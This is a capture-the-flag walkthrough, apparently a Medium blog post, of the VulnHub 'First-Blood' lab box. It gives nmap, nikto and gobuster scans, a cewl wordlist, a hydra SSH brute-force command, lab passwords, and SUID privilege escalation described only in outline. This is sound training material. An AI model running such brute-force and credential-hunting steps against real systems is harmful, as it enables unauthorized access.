Very Easy box..all Thanks to the author for making the box so easy with leaning curve for beginners..

Its guides u from the start of the box and lets you do some research as well.

Please ping him at twitter at link

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Enumeration
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Nmap Scan
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

nmap -sC -sV -p- 192.168.2.113 -oN first_blood

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — Nikto Scan
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

nikto -h http://192.168.2.113

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Running Gobuster
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

gobuster dir -u http://192.168.2.113 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html

__________________________________________________________________#Checking Directory

Gets a potential username

USER 1: johnny

USER 2 : rambo

gives hint to perform scans which we have already done above :-p

looking in new directory from robots.txt

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Generating wordlist using Cewl
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

cewl -w words.txt -d 1 -m 5 http://192.168.2.113/johnnyrambo/

#Looking in ssh.html

http://192.168.2.113/johnnyrambo/ssh.html

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Brute-Frocing SSH Hydra
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

hydra -l johnny -P words.txt -v 192.168.2.113 ssh -s 60022 -t 4

#Password for user:

user : johnny

password : Vietnam

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
SSH login
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

ssh johnny@192.168.2.113 -p 60022

############################################
Lets root the box
############################################

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Get 0xr2d2’s stories in your inbox

Join Medium for free to get updates from this writer.

johnny@firstblood:/$ cat /etc/nginx/sites-enabled/default | grep -v “#”

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

johnny@firstblood:/$ cat /var/www/html

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

johnny@firstblood:/$ find / -type f -readable 2>/dev/null | grep

found a readme.txt in opt which have creds

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
#Finding Creds of blood user

username : blood

password: HackThePlanet2020!!
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

#Switching User from johnny to blood

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Reading other README.txt

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

from here i found that i have to use SUID to gain user privileged from blood to other privileged user
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

#Find the blood can read sly user file by SUID prevesc

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

#Creds of user sly

username : sly

password: SylvesterStalone
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
#Finding SUID bit prevesc

looked in gtfo-bins for prevesc

so we can see here ftp can be run all by users
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

#Prev_Esclation from sly to root

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

#Getting root flag

VulnHub:- First-Blood

#Looking in ssh.html

Get 0xr2d2’s stories in your inbox